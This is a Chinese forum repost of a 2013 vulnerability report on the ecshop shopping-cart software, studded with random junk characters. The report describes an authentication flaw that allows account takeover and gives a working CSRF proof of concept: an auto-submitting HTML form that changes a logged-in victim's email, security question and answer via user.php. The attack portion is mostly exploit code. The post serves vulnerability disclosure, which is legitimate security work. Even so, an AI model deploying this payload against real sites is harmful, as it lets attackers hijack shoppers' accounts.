找回密码
 立即注册
查看: 2756|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
1 u, J0 H" X; g' w% }5 K; [$ u0 ^ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
0 b2 p0 P' ~$ ]6 z; Q6 J4 S0 c) R6 w! n- v* t" S) G
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
; n. W8 t. \9 O7 ^8 |, z$ K
8 }& h" |! Y, v4 G! p+ T, z* l详细说明:2 }# Y1 f! j& a; R+ l5 t7 j
利用csrf和xss可以突破官方所说的“障碍”9 f- @5 C' U1 i" K3 a4 ?1 M5 D
xss版本已经有人说明
  b% F2 S) X6 |5 t4 w4 Z, K这里给出csrf版本( m1 I  a& F1 }

8 p+ n+ D! w4 W0 h6 A漏洞证明:5 B( N  X4 ~" d. }
<html>
1 ^' O# g( d2 N5 {, E/ y* ]3 S6 G<body>4 @/ A; w/ W& F4 k6 s4 I$ E/ w" L
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">2 d% S" M: j5 f$ r1 F  F+ H
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">+ `2 \( e8 j1 J
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
; k( W- r5 d$ k. v<INPUT TYPE="text" NAME="sel_question" value="ecshop">1 A/ r! P! G) x! p5 N; W$ R2 y! o
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: F0 t7 q$ I9 g; i  E</body>
; u7 ?: R( Y" b2 t( D# `) M$ M+ x* Z<script>. s: v  @$ w8 `0 [7 {
document.forms[0].submit();+ }* M# ?+ x5 ^$ k. M7 U$ M* ?
</script>5 k0 F; g9 i7 Q
</html>
! T0 F3 S1 H& i  i/ y5 Y/ b) _) Q- I构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
1 e6 A+ Q# ~" f9 ~
( S2 u7 t7 ]" O4 W( K+ g2 L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表